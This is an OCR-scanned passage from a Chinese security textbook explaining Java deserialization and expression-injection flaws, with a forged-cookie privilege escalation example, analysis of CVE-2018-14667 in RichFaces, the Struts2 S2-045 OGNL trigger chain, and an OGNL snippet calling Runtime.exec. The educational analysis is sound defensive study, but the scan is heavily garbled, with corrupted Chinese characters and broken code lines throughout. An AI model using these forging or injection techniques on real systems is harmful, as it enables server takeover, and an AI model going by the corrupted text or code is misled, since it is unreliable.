应 用 程序 。 好 比 Python 的 某 个 官 万 库 出 现 了 一 种 漏洞 的 利用 方式 ， 那 么 同样 能 够 影响 很 多 Python 程 
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序列 化 和 反 序 列 化 过 程 是 为 了 方便 数据 传输 而 产生 的 设计 ， 只 要 给 反 序 列 化 过 程 传输 屎 意 数据 残 能 达 
到 攻击 效果 ， 这 个 过 程 可 以 这 么 理解 : A、B 的 计算 机 上 没有 病毒 ，A 想 给 B 用 U 盘 复制 一 个 文件 ， 如 果 
U 盘 落 到 某 个 不 怀 好 意 的 人 手 里 ， 附 加 了 病毒 ， 交 给 B 使 用 ， 那 么 最 终 B 的 计算 机 就 能 中 毒 。 很 多 过 程 
也 可 以 看 做 序列 化 和 反 序 列 化 的 过 程 ， 如 使 用 Photoshop 画 图 ， 完 成 后 需要 保存 成 文件 ， 这 就 是 序列 
化 过 程 ， 下 次 再 打开 这 个 文件 ， 丈 是 反 序 列 化 过 程 ， 文 件 即 是 需要 传输 或 者 存储 的 数据 ， 操 作 这 些 数 
据 的 相关 代码 残 是 “打包 ”“ 解 包 ” 操 作 。 


3. 漏洞 特征 
Java 有 各 种 各 样 的 序列 化 和 反 序 列 化 的 工具 ， 如 : 
党 JDK 目 市 的 Serializable。 
必 fastjson 和 jackson 是 JSON 的 知名 序列 化 工具 。 
学 xmldecoder 和 xstream 是 XML 的 知名 序列 化 工具 等 。 
下 文 只 介绍 JDK 原 生 Serializable。 
4. 漏洞 入 口 点 


Objectlnputstream 对 象 的 readObject 函 数 调用 是 Java 反 序列 化 流程 的 入 口 ， 但 是 需要 考虑 序列 化 
数据 的 来 源 。Web 程 序 中 序列 化 数据 的 来 源 包括 : Cookie、GET 参 数 、POST 参 数 或 者 流 、HTTP 
或 者 来 自用 户 可 控 内 容 的 数据 库 等 。 


sle 


5 .数据 特征 


序列 化 的 数据 头 都 是 不 变 的 ， 在 传输 过 程 中 可 能 会 对 字 节 流 进行 编码 ， 解 码 后 查看 字 节 流 开 涉 。 正 常 
序列 化 数据 的 字 节 流 头 部 为 ac ed 00 05， 而 经 过 Base64 编 码 过 序列 化 数据 的 字 节 流 头 部 为 rDOAB.。 


10.2.6.2 漏洞 利用 形式 
JDK 原 生 反 序列 化 工具 Serializable 大 致 有 两 种 利用 形式 。 


一 是 生成 完整 对 象 前 的 利用 。 在 JDK 对 恶意 序列 化 数据 进行 反 序 列 化 的 过 程 中 达成 攻击 效果 ， 这 种 利 
用 方式 大 多 基于 对 Java 开 有 中 频繁 调用 函数 的 理解 ， 寻 找到 漏洞 触发 点 。 例 如 ， 经 典 的 commons- 


ele)| [Teldle]ek 


3.1 反 序列 化 漏洞 利用 中 的 rce gadget 属 于 以 readObject 消 数 的 调用 点 为 入 口 ， 直 接 在 依赖 
包 中 寻找 到 RCE 的 利用 方式 。 


二 是 生成 完整 对 象 后 的 利用 。 如 身份 令 牌 抒 列 化 ， 要 竺 对象 反 序 询 化 完成 后 ， 利 用 其 中 的 冰 数 或 者 
属性 值 来 形成 攻击 。 


第 一 种 利用 形式 有 很 多 分 享 的 参考 文献 ， 由 于 篇 幅 原 因 ， 在 此 仅 对 第 二 种 利用 形式 举 一 个 例题 和 一 个 
真实 漏洞 梓 例 。 


1. Serializable 漏 洞 利用 形式 例题 
DE eg 
(1) Clientlnfo 类 ， 用 于 身份 验证 


nihlir clace CliontTnfn imnlomonte Sorializahio { 
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private static final Long serialVersionUID = 1L.; 
private String name ; 
private String group; 
private String id, 
public ClientInfo(String name, String group, String id) { 
this.name = name; 
this.group = group,; 
this.id = id; 
} 
public String getName() { 
return name ; 


} 
public String getGroup(){ 
return group | 


} 
public String getId(){ 
return id; 


(2) Clientinforilter 类 属于 拦截 器 ， 用 于 解析 并 转换 客 己 新 传输 的 cookie 


其 中 ，doFilter(O0 国 数 如 下 : 


public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) 
throws IOException, ServletException { 
Cookie[] cookies = ((HttpServletRequest)request).getCookies(); 
boolean exist = false; 
Cookie cookie = null; 
if( cookies != nuLL ) { 
for (Cookie c : cookies) { 
if (c.getName().equals("cinfo")) { 
exist = true; 
cookie = ci 
break ; 


if(exist ){ 
String b64 = cookie.getValue(); 
Base64.Decoder decoder = Base64.getDecoder(); 
byte[] bytes = decoder.decode(b64); 
ClientInfo cinfo = null; 
if(b6d.equals("") || bytes==null ){ 
cinfo = new ClientInfo("Anonymous", "normal", \ 
((HttpServletRequest) request).getRequestedSessionId()); 
Base64.Encoder encoder = Base64.getEncoder(); 
try { 
bytes = Tools.create(cinfo); 
} 
catch (Exception e) { 
e@.printStackTrace(); 
} 
cookie.setValue(encoder.encodeToString(bytes)); 
} 
else { 
try { 
cinfo = (ClientInfo) Tools.parse(bytes); 
} 
catch (Exception e) { 
e.printStackTrace(); 
} 
} 
((HttpServletRequest)request).getSession(). setAttribute("cinfo", cinf0); 
} 
else { 
Base64.Encoder encoder = Base64.getEncoder(); 
try { 
ClientInfo cinfo = new ClientInfo("Anonymous", "normal", \ 
((HttpServletRequest) request).getRequestedSessionId()); 
byte[] bytes = Tools.create(cinfo); 
cookie = new Cookie("cinfo", encoder.encodeToString(bytes)); 
cookie.setMaxAge(60*60*24); 
((HttpServletResponse)response) .addCookie(cookie); 
((HttpServletRequest)request).getSession().setAttribute("cinfo", cinfo); 
} 
catch (Exception e) { 
e.printStackTrace(); 
1 
} 
chain.doFilter(request, response); 


} 


上 述 代 码 大 致意 思 是 轮 询 Cookie， 并 找 出 key 值 为 cinfo 的 Cookie， 否 则 就 初始 化 : 


CLientInfo("Anonymous"，"normaL"，((HttpServLetRequest) request) .getRequestedSessionId()); 


编码 后 返回 名 为 cinfo 的 Cookie， 人 否则 通过 解码 操作 还 原 Clientlnfo 对 象 。 


(3) Tools 对 象 ， 用 于 序列 化 和 反 序 列 化 


public class TooLs { 


static public Object parse(byte[] bytes) throws Exception { 
ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bytes)); 
return ois.readObject(); 

} 

static public byte[] create(Object obj) throws Exception { 
ByteArrayOutputStream bos = new ByteArrayOutputStream(); 
ObjectOutputStream outputStream = new ObjectOutputStream(bos); 
outputStream.write0bject(obj); 
return bos.toByteArray(); 


现在 有 一 处 上 传 点 ， 但 是 根据 Clientlnfo 检 查 了 用 户 身份 ， 代 码 如 下 : 


@RequestMapping("/uploadpic. form") 
public String upload(MultipartFile file, HttpServletRequest request, 
HttpServletResponse response) throws Exception { 
ClientInfo cinfo = (ClientInfo)request.getSession().getAttribute("cinfo"); 
if(!cinfo.getGroup().equals("webmanager")) 
return "notaccess"; 
if(file == null) 
return "uploadpic"; 
/1 立 狂 夯 锋 禾 
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Te Ai 
String originalFilename = ((DiskFileItem) ((CommonsMultipartFile) file).getFileItem()).getName(); 
String reaLPath = request.getSession().getServletContext().getRealpath("/Web-INF/resource/"); 
String path = reaLPath + originalFilename; 
file.transferTo(new File(path)); 
request .getSession().setAttribute("newpicfile", path); 
return "uploadpic"; 
} 


如 果 用 户 此 时 具有 webmanager 权 限 ， 便 能 通过 权限 校 验 进而 能 够 进行 文件 上 传 操 作 ， 因 此 需要 构造 
Clientinfo 的 属性 。 
伪造 Clientinfo 的 流程 很 简单 ， 新 建 一 个 工程 ， i ee 
IentiInfo 
Java 两 个 文件 中 ， 然 后 在 Main.java 的 main 函 数 中 写 入 并 运行 ， 融 能 得 到 具有 webmanager 
权限 的 cookie: 


System.out .println("webmanager: " + encoder.encodeToString(Tools.create(new 
encoder.encodeToString(Tools.create(new ClientInfo("test", "webmanager", "1")))); 


携带 伪造 出 的 Cookie 再 去 访问 Upload.form 页 面 ， 就 能 上 传 文件 获取 服务 器 权限 了 。 


我 们 可 以 从 这 个 例子 中 了 解 反 序列 化 漏 浊 的 利用 方式 和 流程 ， 实 际 操 作 时 需要 上 自己 针对 程序 结构 构造 
EXP。 公 开 的 commons 等 库 的 反 序列 化 RCE 同 理 ， 只 是 具体 的 触发 流程 存在 差异 。 


2 .Serializable 漏 洞 利用 形式 样 例 : CVE-2018-14667 


这 个 漏洞 的 编号 是 颁发 给 RichFaces 框 架 的 ，JBOSS RichFaces 和 Apache myfaces 是 两 个 比较 出 名 
的 JSF 实 现 项 目 。 这 个 漏洞 产生 的 原因 是 接受 了 来 自 客户 新 的 不 可 信和 序列 化 数据 ， 并 且 将 其 反 序 列 
化 ， 昌 然 官 方 使 用 了 设 定 反 序列 化 白 名 单 的 方式 过 滤 恶 意 数 据 ， 但 是 由 于 功能 设计 的 原因 ， 最 终 还 是 
= 


有 的 安全 人 员 对 其 历史 漏洞 做 过 分 析 ， 认 为 加 上 日 名 单 以 后 无 法 通过 第 一 种 利用 形式 构造 利用 链 ， 所 
以 认为 不 再 有 利用 链 ， 但 是 在 2018 年 义 有 了 白 名 单 的 利用 链 。 


RichFaces 3.4 中 的 反 序列 化 类 白 名 单 见 图 10-2-13， 已 知 依赖 包 中 的 Gadget 都 不 起 作用 ， 反 序列 化 
的 类 必须 是 图 中 的 类 或 者 其 子 类 。 注 意 ，javax.el.Expresion 类 是 EL 表达 式 的 主要 接口 之 一 。EL 表 达 
式 是 可 以 执行 任意 代码 的 ， 通 过 这 个 思路 ， 如 果 反 序列 化 的 类 是 Expression 的 子 类 并 且 在 后 续 程序 执 
行 沈 程 中 调用 了 表达 式 执行 的 亢 数 ， 融 能 RCE 了 。 这 个 CVE 融 是 利用 Expression 的 子 类 ， 并 且 找到 了 
MathodExpression#invoke、ValueExpression##getValue 的 函数 调用 ， 生日 名 年 限 入 霹 成 了 


oo 


6 whitelist =|org.ajax4jsf.resource.InternetResource, 

7 org.ajax4jsf.resource.SerializableResource, 
8 Javax.el.Expression, 

> javax.faces.el.MethodBinding, 

0 Javax .faces .Component .stateHolderSaver, 

. java.awt .Color 


图 10-2-13 


有 反 序 列 化 的 检查 在 org.ajax4jsf.resource.LookAheadObjectinputStream#resolveClass 中 ,， 代 
码 如 下 : 


/x** 
* Only deserialize primitive or whitelisted classes 
*/ 


@Override 
protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException { 
Class<?> primitiveType = PRIMITIVE_TYPES.get(desc.getName()); 
if (primitiveType != null) { 
return primitiveType; 
} 
if (!isClassValid(desc.getName())) { 
throw new InvalidClassException("Unauthorized deserialization attempt", desc.getName()); 
} 


return super.resolveClass(desc); 


上 述 代 码 先 调用 desc.getName 获 取 需 要 反 序 列 化 的 类 名 ， 再 通过 isClassValid 久 数 进 行 白 名 单 检 查 ， 
代码 如 下 : 


boolean isClassValid(String requestedClassName) { 
if (whitelistClassNameCache.containsKey(requestedClassName)) { 
return true; 


} 
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Wy 
Class<?> requestedClass = Class.forName(requestedClassName); 
for (Class baseClass : whitelistBaseClasses ) { 
if (baseClass.isAssignableFrom(requestedClass)) { 
whitelistClassNameCache.put(requestedClassName, Boolean.TRUE); 
return true; 
. 
} 
} 
catch (ClassNotFoundException e) { 


return false; 
# 
return false; 


whitelistClassNameCache 是 一 些 基础 类 ， 如 String、Boolean、Byte 等 ， 如 果 不 是 基础 类 型 ， 又 不 
是 白 名 单 中 的 类 或 其 子 类 ， 那 么 返回 false， 所 以 在 resolveClass 时 直接 抛 出 异常 ， 停 止 反 序列 化 。 


CVE-2018-14667 漏 洞 最 终 在 org.ajax4jsf.resource.UserResource 中 找到 了 javax.el.Expression 子 类 
并 朋 | 二 5 忆 二 人 Keill des sebillgSs is ellias ae[iEcEddreieliil 二 el 


public void send(ResourceContext context) throws IOException { 
UriData data = (UriData) restoreData(context); 
FacesContext facesContext = FacesContext.getCurrentInstance(); 
if (null != data && null != facesContext ) { 
// Send headers 
ELContext elContext = facesContext.getELContext(); 
// Send content 
OutputStream out = context.getOutputStream(); 
MethodExpression send = (MethodExpression) UIComponentBase. \ 
restoreAttachedState(facesContext, data.createContent); 
send.invoke(elContext,new Object[]{out, data.value}); 


try{ // https://jira.jboss.org/jira/browse/RF-8064 
out .flush(); 
out .close(); 

} 

catch (IOException e) { 
// Ignore it, stream Would be already closed by user bean. 


如 上 代码 调用 了 MethodExpression#invoke， 其 中 data 是 用 户 可 控 的 反 序 列 化 的 结果 ， 代 表 的 是 EL 
表达 式 语 句 ， 在 invoke 函 数 调用 的 时 候 传 入 可 控 的 EL 表达 式 语 句 ， 进 而 造成 RCE。 


@Override 

public Date getLastModified(ResourceContext resourceContext) { 
UriData data = (UriData) restoreData(resourceContext); 
FacesContext facesContext = FacesContext.getCurrentInstance(); 


if(null != data && null != facesContext) { 
ELContext elContext = facesContext.getELContext(); // Send headers 
if(data.modified != null) { 
ValueExpression binding = (ValueExpression) UIComponentBase. \ 
restoreAttachedState(facesContext, data.modified); 
Date modified = (Date) binding.getValue(elContext); 
if(null != modified) { 
return modified; 


} 


J 


return super.getLastModified(resourceContext); 


如 上 代码 调用 了 ValueExpression# getValue， 也 会 触发 EL 表达 式 的 执行 。 


更 多 详细 分 析 和 和 EXP 脚本 可 参考 https://xz.aliyun.com/t/3264， 有 兴趣 的 可 以 详细 查看 。 后 文 会 对 
EL 进行 评 尽 的 介绍 和 分 析 。 


10.2.7 表达 陈 注入 


10.2.7.1 表达 式 注 入 概述 


对 于 Java Web 来 说 ， 能 够 造成 命令 执行 的 两 种 常见 的 漏洞 类 型 为 反 序列 化 漏洞 和 表达 式 注 入 漏洞 
es er pr xpression 
Language Injection) ， 本 质 还 是 远程 命令 执行 漏洞 或 远程 代码 执行 漏洞 。 但 是 这 些 


GE 
的 漏洞 都 具有 一 个 共同 的 特征 一 都 是 由 于 过 滤 不 严 或 功能 滥用 导致 攻击 者 可 以 构造 对 应 的 表达 式 
完成 命令 或 代码 执行 。 最 著名 的 就 是 Struts2 的 OGNL 系 列 漏洞 。 


造成 表达 陈 注 入 漏洞 主要 原因 是 由 于 应 用 对 于 外 部 输入 过 滤 不 严 或 不 恰当 的 应 用 而 导致 攻击 者 可 以 控 
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制 数据 进入 EL (表达 陈 语言 ) 解释 器 中 ， 这 样 最 终 会 造成 表达 式 注入 。 
EL 本 身 的 功能 是 支持 开 友 人 员 在 上 下 文 环境 中 获取 对 铺 、 调 用 Java 方 法 ， 所 以 一 旦 存在 表达 式 注入 漏 
EE un EM Web 框 以 来 
襄 ， 通 党 是 一 种 框架 对 应 一 种 表达 式 ， 也 就是 说 ,一 旦 框架 中 出 现 了 表达 式 注入 漏洞 ， 那 么 会 对 所 有 
基于 该 框架 的 Web 应 用 程序 实现 “ 通 杀 ”。 这 也 是 Struts2 每 次 爆 出 OGNL RCE 漏 洞 时 ， 都 会 造成 
“ 血 雨 腥 风 ” 的 原因 。 


除了 框架 与 其 “ 绑 定 ”的 表达 式 (如 Struts2 与 OGNL 的 关系 ) ， 还 有 很 多 其 他 情况 下 的 表达 式 注 入 ， 
如 Groovy 的 代码 注入 、SSTI (服务 问 模 版 注入 ) 等 ， 造 成 漏洞 的 原因 都 是 由 于 攻击 者 可 以 控制 数据 
进入 表达 陈 解 析 器 。 


10.2.7.2 表达 式 注 入 漏洞 特征 
Java 中 存在 各 种 各 样 的 表达 式 语言 ， 它 们 在 各 自 的 领域 发 挥 着 不 同 的 功能 ， 下 面 列举 两 个 与 框架 关系 
较为 紧密 的 表达 式 语言 ， 同 样 ， 这 两 个 表达 式 语言 出 现 表 达 式 注入 时 所 造成 的 危害 也 是 最 大 的 。 


Struts2-OGNL: “漏洞 之 王 ”， 由 于 Struts2 玖 怖 的 覆 匡 率 ， 每 次 出 现 新 的 表达 式 注入 漏 ; 间 时 ， 都 会 
造成 巨大 的 影响 。 这 也 是 被 攻防 双方 理解 的 最 透彻 的 表达 式 语 言 。 


Spring-SPEL: SPEL 即 Spring EL， 是 Spring 框 染 专 有 的 EL 表达 式 。 相 对 于 其 他 表达 式 语 言 ， 其 使 用 
面相 对 较 窒 ， 但 是 从 spring 框 如 使 用 的 广泛 性 来 看 ， 还 是 有 值得 研究 的 价值 。 


无 论 是 OGNL 还 是 ?PEL， 触 各 漏洞 的 天 键 点 都 是 表达 陈 的 解析 部 分 。 


比如 ，OGNL 执 行 系统 命令 的 代码 的 例子 如 下 ; 


import ognl.Ognl; 
import ognl.OgnlContext; 
import ognl.OgnlException; 


public class Test { 
public static void main(String[] args) throws OgnlException { 
ext = new OgnlContext(); 
// @[ 类 全 名 (包括 包 路 径 )@[ 方 法 名 | 值 名 ]] 
// 执行 命令 
Object obj = Ognl.getValue("@java.lang.Runtime@getRuntime(). \ 
exec('open /Applications/Calculator.app')", context); 
System.out .println(obj); 


运行 这 个 示例 代码 时 会 弹出 计算 器 (因为 使 用 的 是 MacOS， 所 以 执行 的 系统 命令 与 Windows 平 台 
所 区 别 ) 。 表 达 式 解析 的 三 要 素 为 : 表达 式 ， 上 下 文 ( 例 中 的 context) ，getValue() 完 成 执行 。 这 
同样 是 表达 式 注 入 漏洞 必 不 可 少 的 三 个 主要 特征 。 进 行 漏洞 挖掘 时 要 以 这 三 点 作为 基础 : 表达 式 可 
控 ， 绕 过 上 下 文中 存在 的 过 滤 机 制 ， 寻 找 执行 表达 式 的 点 。 这 三 点 全 部 串 起 来 ， 就 形成 了 一 个 完整 的 
表达 式 注 入 Gadget。 


10.2.7.3 表达 式 结构 概述 


“ 知 其 然 知 其 所 以 然 ” 对 于 搞 安全 的 人 来 说 是 非常 重要 的 一 个 素质 ， 下 面 以 OGNL 为 例 简单 解释 表达 
式 解 析 结 构 的 组 成 ， 这 对 后 续 理解 表达 式 注 入 漏洞 有 很 大 的 帮助 。 


1. root#hcontext 
在 OQGNL 中 最 重要 的 两 部 分 分 别 为 root ( 根 对 象 ) 、context (上 下 文 ) 。 
root: 可 以 理解 为 一 个 Java 对 象 。 表 达 陈 规定 的 所 有 操作 都 是 通过 root 来 指定 其 对 哪个 对 象 进行 操作 


的 。 
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99Qte 闪 理解 为 对 稼 运行 的 上 下 文 环境 。 context 以 MAP 的 结构 ， 利 用 键 值 对 关系 来 描述 对 象 
处 理 OGNL 的 顶层 对 象 是 一 个 Map 对 象 ， 通 常 称 为 context map 或 者 context。OGNL 的 root 束 在 
ele] aNd 
map 中 。 表 达 式 中 可 以 直接 引用 root 对 象 的 属性 ， 如 果 需 要 引用 其 他 的 对 象 ， 那 么 需要 使 用 
“# ”标记 。 


Xt 


Struts2 将 OGNL 的 context 变 成 了 ActionContext， 将 root 变 成 了 ValueStack。Struts2 将 其 他 对 象 和 
ValueStack 一 起 放 在 ActionContext 中 ， 这 些 对 象 包 括 application、session、request context 的 上 
下 文 映射 ， 见 图 10-2-14。 


|--application 


|--session 
context map-—- | 
|--value stack(root) 


|--action (the current action) 


|--request 


|--parameters 


|--attr (searches page, reguest, session, then application scopes) 


图 10-2-14 ( 引 自 Apache OGNL 官 方 文档 ) 


PA (old [ol lee] ld 


ActionContext 是 action 的 上 下 文 ， 其 本 质 是 一 个 Map 对 象 ， 可 以 理解 为 一 个 action 的 小 型 数据 库 ， 
整个 action 生 命 周 期 (线程 ) 中 所 使 用 的 数据 都 在 其 中 。OGNL 中 的 ActionContext 就 是 充当 context 
的 ， 见 图 10-2-15。 


ActionContext 中 三 个 常见 的 作用 域 为 request、session、application。 


学 attr 作 用 域 保存 着 上 面 三 个 作用 域 的 所 有 属性 ， 如 果 有 重复 的 ， 则 以 request 域 中 的 属性 为 
基准 。 


学 paramters 作 用 域 保存 的 是 表单 提交 的 参数 。 


学 VALUE_STACK 束 是 常 说 的 值 栈 (Valuestack) ， 保 存 着 值 栈 对 象 ， 可 以 通过 


aXeldlelal Glel nl 


访问 到 值 栈 中 的 值 。 
3. 值 栈 


值 栈 本 身 是 一 个 ArrayList， 充 当 OGNL 的 root， 见 图 10-2-16。 


ActionContext(map) 


application 


paramters 
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图 10-2-15 


CompoundRoot 


Context 


是 ActionContext 的 引 
用 


图 10-2-16 
root 在 源码 中 称 为 CompoundRoot， 它 也 是 一 个 栈 ， 每 次 操作 值 栈 的 出 、 入 栈 操 作 其 实 是 对 


Gel1ijjelellliiel ele 
进行 对 应 操作 。 当 访问 一 个 action 时 ， 就 会 将 action 加 入 栈 顶 ， 而 提交 的 各 种 表单 参数 会 在 


值 栈 从 顶 向 下 查找 对 应 的 属性 进行 赋值 。 这 里 的 context 就 是 ActionContext 的 引用 ， 方 便 在 值 栈 中 去 
查找 action 的 属性 。 


4. ActionContext 与 值 栈 的 关系 


其 实 ActionContext 与 值 栈 是 “相互 包含 ”的 关系， 准确 地 车 ， 值 栈 是 ActionContext 的 一 部 分 ， 而 


| ActionContext 
摘 述 的 也 不 只 是 一 个 DGNLcontext 的 代替 品 ， 毕 葛 它 更 多 的 是 为 action 构 建 一 个 独立 


的 运行 环境 (新 的 线程 ) ， 因 此 可 以 通过 值 栈 访问 ActionContext 中 的 属性 ， 反 之 亦 然 。 


其 实 ， 可 以 用 一 种 不 标准 的 表达 方式 来 描述 这 样 的 天 系 : 可 以 把 值 材 当 做 ActionContext 的 系 3 引 ， 婚 
可 以 直接 通过 率 引 找到 表 中 的 数据 ， 也 可 以 在 表 中 找到 所 有 数据 的 率 引 ， 融 像 书 与 目录 的 关系 。 


5. 小 结 


在 理解 了 表达 式 结 构 后 ， 重 新 审视 表达 式 注 入 漏洞 ， 我 们 会 发 现 表 达 式 注入 漏洞 的 关键 在 于 利用 表达 
式 来 操作 上 下 文中 的 内 容 ， 特 别 注 意 ActionContext 与 值 栈 的 关系 ， 表 达 式 实际 上 是 可 能 操作 该 线程 
的 上 下 文 内 容 的 ， 这 可 能 造成 严重 的 RCE。 


10.2.7.5 S2-045 简 要 分 析 


S2-045 是 一 个 非常 经 典 的 表达 式 注入 漏洞 ， 下 面 利用 这 个 漏洞 展现 一 个 完整 的 表达 式 注入 过 程 。 整 
体 触 友 流 程 如 下 : 


MultiPpartRequestWrapper$MultiPpartRequestWrapper:86 # 处 理 requests 请 求 
JakartaMultipartRequest$parse:67 # 处 理 上 传 请 求 ， 捕 提 上 传 异常 
JakartaMuLtipPartRequest$processUpLoad :91 # 解析 请 求 
JakartaMuLtipPartRequest$parseRequest:147 # 创建 请 求 报 文 解析 器 ， 解 析 上 传 请 求 
JakartaMultipartRequest$createRequestContext # 实例 化 报 文 解析 器 
FileUploadBase$parseRequest:334 # 处 理 符合 multipart/form-data 的 流 数据 
FiLeUpLoadBase$FiLeItemIteratorImpL:945 # 抛 出 ContentType 错误 的 异常 ， 并 把 错误 
# 的 ContentType 添加 到 报错 信息 中 
JakartaMultipartRequest$parse:68 # 处 理 文件 上 传 异常 
AbstractMultipartRequest$buildErrorMessage:102 # 构建 错误 信息 
LocalizedMessage$LocalizedMessage:35 # 构造 函数 赋值 
FileUploadInterceptor$intercept:264 # 进入 文件 上 传 处 理 流程 , 处 理 文件 上 传 报错 信息 
LocalizedTextUtil$findText:391 # 查找 本 地 化 文本 消息 
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LocalizedTextUtil$findText:573 # 获取 默认 消息 
# 以 下 为 ognl 表达 式 的 提取 与 执行 过 程 
LocalizedTextUtil$getDefaultMessage:729 
TextPparseUtils$translateVariables:4y 
TextParseUtil$translateVariables:122 
TextParseUtil$translateVariables:166 
TextParser$evaluate:11 
OgnlTextParser$evaluate:10 


1. 触发 点 分 析 


S2-045 漏 洞 原理 是 Struts2 在 处 理 Content-Type 时 ， 如 果 获 得 的 是 未 预期 的 值 ， 束 会 爆 出 一 个 异常 ， 
在 此 异常 的 处 理 中 会 造成 RKCE。 在 漏洞 的 描述 中 可 以 得 知 Struts2 在 使 用 Jakarta Multipart 解 析 器 来 处 
理 文件 上 传 时 会 造成 RKCE。Jakarta Multipart 解 析 器 在 Struts2 中 的 org.apache.struts2. ee 
.multipart.JakartaMultiPartRequest， 是 默认 组 件 之 一 。 


跟 进 validation 的 执行 流程 ，validation 的 调用 位 于 Struts2 的 FileUploadlnterceptor 中 ， 即 处 理 文件 
上 传 的 拦 堆 器 。 


MultipartRequestWrapper multiWrapper = (MultipartRequestWrapper) request; 
if (multiWrapper.hasErrors()) { 
for (LocalizedMessage error : multiWrapper.getErrors()) { 
if (validation != null) { 
validation.addActionError(LocalizedTextUtil .findText(error.getClazz(), \ 


error.getTextKey(), ActionContext.getContext().getLocale(), \ 
error.getDefaultMessage(), error.getArgs())); 


跟 进 LocalizedTextUtil.findText: 


public static String findText(Class aClass, String aTextName, Locale locale, 
String defaultMessage, Object[] args) { 
ValueStack valueStack = ActionContext.getContext().getValueStack(); 
return findText(aClass, aTextName, locale, defaultMessage, args, valueStack); 


} 


根据 10.2.7.4 节 的 内 容 可 知 ， 这 里 获取 了 值 栈 ， 并 将 其 作为 参数 带 入 findText() 方 法 。 该 方法 代码 很 
长 ， 下 面 截取 关键 部 分 


GetDefaultMessageReturnArg result; 
if (indexedTextName == null) { 
result = getDefaultMessage(aTextName, locale, valueStack, args, defaultMessage); 
} 
else { 
result = getDefaultMessage(aTextName, locale, valueStack, args, null); 
if (result != null && result.message != null) { 
return result.message; 
} 
result = getDefaultMessage(indexedTextName, locale, valueStack, args, defaultMessage); 


} 


这 里 调用 了 getDefaultMessage() 方 法 ， 其 中 存在 一 个 将 消息 进行 格式 化 的 方法 
buildMessageFormat 
()， 而 消息 是 通过 TextParseUtil.translateVariables 的 处 理 生成 的 : 


if (message != nuLL) { 
MessageFormat mf = buildMessageFormat(TextParseUtil.translateVariables(message, \ 
valueStack), locale); 
String msg = formatWithNullDetection(mf, args); 
result = new GetDefaultMessageReturnArg(msg, found); 
3 


跟 进 TextParseUtiltranslateVariables 的 具体 实现 ， 可 以 发 现 它 将 message 当 做 表达 式 并 完成 表达 式 
的 解析 、 执 行 表达 式 : 


public static String translateVariables(String expression, ValueStack stack) { 
return translateVariables(new char[]{'$', '%'}, expression, stack, String.class, null).toString(); 
} 
public static Object translateVariables(char[] openChars, String expression, 
final ValueStack stack, final Class asType, final ParsedValueEvaluator evaluator, 
int maxLoopCount) { 
ParsedValueEvaluator ognlEval = new ParsedValueEvaluator() { 
public Object evaluate(String parsedValue) { 
Object o = stack.findValue(parsedValue, asType); 


if (evaluator != null && o != null) { 
0 = evaluator.evaluate(o.toString()); 
F 
return o0; 
} 
ys 
TextParser parser = ((Container)stack.getContext().get(ActionContext .CONTAINER)). \ 
getInstance(TextParser.class); 

return parser.evaluate(openChars, expression, ognlEval, maxLoopCount); 


向 上 跟踪 ， 发 现 message 是 由 defaultMessage 生 成 的 ， 所 以 表达 式 与 defaultMessage 有 关 。 


2. 可 控 点 分 析 
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根据 触发 点 分 析 ， 如 果 可 以 控制 defaultMessage， 便 可 以 自 定义 表达 式 从 而 造成 RCE 漏 洞 。 查 看 如 
让 供 售 : 


if (multiWrapper.hasErrors()) { 
for (LocalizedMessage error : multiWrapper.getErrors()) { 
if (validation != null) { 
validation.addActionError(LocalizedTextUtil .findText(error.getClazz(), \ 
error.getTextKey(), ActionContext.getContext().getLocale(), \ 
error.getDefaultMessage(), error.getArgs())); 


可 知 defaultMessage 是 由 error.getTextKey() 生 成 的 ， 所 以 与 报错 有 关 。 
继续 向 上 跟踪 ， 则 与 Struts2 处 理 文 件 上 传 请 求 的 逻辑 有 关 。 


Struts2 处 理 请 求 文 件 上 传 请 求 所 用 的 默认 组 件 是 org.apache.struts2.dispatcher.multipart. 
JakartaMultiPartRequest 
， 上 其 报错 处 理 如 下 : 


try { 
setLocale(request); 
processUpload(request, saveDir); 
} 
catch (FileUploadException e) { 
LOG.warn("Request exceeded size limit!", e); 
LocalizedMessage errorMessage; 
if(e instanceof FileUploadBase.SizeLimitExceededException) { 
FiLeUpLoadBase.SizeLimitExceededException ex = (FileUploadBase.SizeLimitExceededException) e; 
errorMessage = buildErrorMessage(e, new Object[]{ex.getPermittedSize(), ex.getActualSize()}); 
} 


可 知 报错 信息 是 由 buildErrorMessage 生 成 的 ，buildErrorMessage 处 理 流程 如 下 : 


protected LocalizedMessage buildErrorMessage(Throwable e, Object[] args) { 
String errorkey = "struts.messages.upload.error." + e.getClass().getSimpleName(); 
LOG.debug("Preparing error message for key: [{}]", errorkey); 
return new LocalizedMessage(this.getClass(), errorkey, e.getMessage(), args); 

} 


这 里 通过 e.getMessage() 获 取 抛 出 的 异常 类 的 message， A Me eS 
elaultiMiessage 
中 。defaultMessage 束 是 之 后 触发 漏洞 的 message， 也 就 是 沈 ， 表 达 式 是 通过 e. 


网 e lad ETle ls 
OBE ES UE lle TEEN 


在 跟踪 processUpload 方 法 时 ， 可 以 看 到 如 下 代码 : 


public FileItemIterator getItemIterator(RequestContext ctx) throws FileUploadException, IOException { 
try { 
return new FileItemIteratorImpl(ctx); 
} 
catch (FileUploadIOException e) { // unwrap encapsulated SizeException 
throw (FileUploadException) e.getCause(); 
和 
} 


跟 踊 Fileltemlteratorlmpl: 


String contentType = ctx.getContentType(); 
if ((null == contentType) || (!contentType.toLowerCase(Locale.ENGLISH).startsWith(MULTIPART))) { 
throw new InvalidContentTypeException( 
format("the request doesn't contain a %s or %s stream, content type header is %s",\ 
MULTIPART_FORM_DATA, MULTIPART_MIXED, contentType)); 


由 上 述 代码 可 各 ， 如 果 contentType 为 空 或 不 以 multipart 开 头 ， 则 会 抛 出 错误 ， 并 把 错误 的 2 
、 re ea SonNtentiype 
加 入 报错 信息 ， 这 里 便 是 我 们 可 控 的 地 方 。 如 果 构 造 一 个 请 求 ， 该 请 求 的 contentType 为 OGNL 


表达 式 ， 就 能 造成 OGNL 表 达 式 注入 。 


10.2.7.6 表达 式 注 入 小 结 


在 分 析 或 挖掘 表达 式 注 入 时 最 重要 的 三 个 特征 是 表达 式 可 控 、 绕 过 上 下 文中 存在 的 过 滤 机 制 、 寻 找 执 
行 表 达 式 的 点 。 它 们 串联 起 来 就 是 一 条 完整 的 利用 链 。 


10.2.8 Java Web 的 漏洞 利用 方式 


